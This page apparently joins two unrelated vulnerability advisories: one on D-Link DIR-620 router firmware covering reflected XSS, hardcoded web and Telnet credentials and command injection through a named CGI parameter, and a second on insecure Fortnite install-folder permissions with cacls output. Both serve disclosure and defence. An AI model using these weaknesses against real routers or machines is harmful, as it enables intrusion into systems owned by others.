The following advisory describes four vulnerabilities and hardcoded accounts in D-Link DIR-620 firmware. The firmware runs on various D-Link routers that one of the biggest ISPs in Russia delivers to its customers (this conclusion is based on the fact that the router is provided as part of the standard customer contract and the hardcoded credentials contain the name of the ISP in the login string). This is probably why this particular model of router is so popular in Russia and CIS countries (most home routers are located behind their ISP’s NAT, which is why these routers don’t appear in the statistics).

Geography of vulnerable routers

The object of research

The latest versions of the firmware have hardcoded default credentials that can be exploited by an unauthenticated attacker to gain privileged access to the firmware and to extract sensitive data, e.g., configuration files with plain-text passwords. The vulnerable web interface allows an unauthenticated attacker to run arbitrary JavaScript code in the user environment and run arbitrary commands in the router’s operating system (OS).

Example of firmware interface (probably customized for ISP purposes)

These issues were originally identified in firmware version 1.0.37. Some of the discovered vulnerabilities were also identified in other versions of the firmware:

  • 1.3.1
  • 1.3.3
  • 1.4.0
  • 2.0.22

Technical details

Weakness in user data validation (reflected cross-site scripting) (CVE-2018-6212)

The one input field that allows user input – Quick search – inspired me to look deeper into the firmware: the field facilitates an XSS attack vector. A reflected cross-site scripting (XSS) attack is possible as a result of missed filtration for special characters in this field and incorrect processing of the XMLHttpRequest object (this vulnerability was discovered in v.1.3.3, but also present in other versions).

Demonstration of a reflected XSS

Vulnerability metrics:

CVSS v3 Base Score: 6.1

Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

Hardcoded default credentials for web dashboard (CVE-2018-6213)

I downloaded the firmware and extracted the filesystem. Most Unix-based firmware includes BusyBox – software that provides several stripped-down Unix tools for embedded systems. It can easily identify the proprietary binary files, i.e., all binaries that are not in the original BusyBox toolset and which were probably modified for ISP purposes.

I extracted strings from the web server binary (httpd), and my attention was immediately drawn to the “anonymous” string. I looked at the function where this string was being used.

The code responsible for checking the user’s credentials contains ‘harcoded credentials’

These privileged credentials cannot be changed by the administrator. Privileged access to the dashboard allows an attacker to extract sensitive data.

Vulnerability metrics:

CVSS v3 Base Score: 6.5

Vector: (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

OS command injection (CVE-2018-6211)

An OS command injection vulnerability is possible as a result of incorrect processing of the user’s input data in the following parameter (the vulnerability was discovered in v.1.0.3):

/index.cgi?<…>&res_buf

Example of request with OS command injection

Vulnerability metrics:

CVSS v3 Base Score: 9.1

Vector: (/CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)

Hardcoded default credentials for Telnet (CVE-2018-6210)

Using the vulnerability above, an attacker can extract Telnet credentials. The credentials were discovered in firmware v1.0.3. For example, by using the default credentials for Telnet an attacker can get administrative access to a router (the fragment of “etc/passwd”).

Demonstration of OS command injection vulnerability

Vulnerability metrics:

CVSS v3 Base Score: 10.0

Vector: (/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

How to fix it

We received an official response from the vendor stating that this router model was no longer supported. In this case, we provide the following recommendations:

  • Restrict any access to the web dashboard using a whitelist of trusted IPs
  • Restrict any access to Telnet
  • Regularly change your router admin username and password

Advisory Status

01/15/2018 – reported to vendor
01/15/2018 – reported to ISP
01/24/2018 – received a response from ISP
02/06/2018 – received a response from vendor. Official statement: the model of router was no longer supported by vendor, so vendor will only patch vulnerabilities if the ISP sends a request to do so.

If you’re interested in similar materials related to vulnerability research and you’d like to receive them first, subscribe to the newsletter

Epic Games Fortnite 4.2-CL-4072250 Insecure File Permissions

i>>?
Epic Games Fortnite 4.2-CL-4072250 Insecure File Permissions

Vendor: Epic Games, Inc.
Product web page: https://www.epicgames.com
Affected version: 4.2-CL-4072250
4.1-CL-4053532
4.0-CL-4039451

Summary: Fortnite is a co-op sandbox survival game developed by Epic
Games and People Can Fly and published by Epic Games. The game was
released as a paid-for early access title for Microsoft Windows, macOS,
PlayStation 4 and Xbox One on July 25, 2017, with a full free-to-play
release expected in 2018. The retail versions of the game were published
by Gearbox Publishing, while online distribution of the PC versions is
handled by Epic’s launcher.

Desc: Fortnite suffers from an elevation of privileges vulnerability which
can be used by a simple authenticated user that can change the executable
file with a binary of choice. The vulnerability exist due to the improper
permissions, with the ‘C’ flag (Change) for ‘Authenticated Users’ group.

Tested on: Microsoft Windows 10 Home

Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
@zeroscience

Advisory ID: ZSL-2018-5469
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5469.php

10.04.2018

E:\Program Files\Epic Games\Fortnite\FortniteGame>dir /b Binaries\Win64\*.exe
FortniteClient-Win64-Shipping.exe
FortniteClient-Win64-Shipping_BE.exe
FortniteClient-Win64-Shipping_EAC.exe
FortniteLauncher.exe

E:\Program Files\Epic Games\Fortnite\FortniteGame>cacls Binaries
E:\Program Files\Epic Games\Fortnite\FortniteGame\Binaries BUILTIN\Administrators:F
BUILTIN\Administrators:(OI)(CI)(IO)F
NT AUTHORITY\SYSTEM:F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)F
NT AUTHORITY\Authenticated Users:C
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)C
BUILTIN\Users:R
BUILTIN\Users:(OI)(CI)(IO)(special access:)
GENERIC_READ
GENERIC_EXECUTE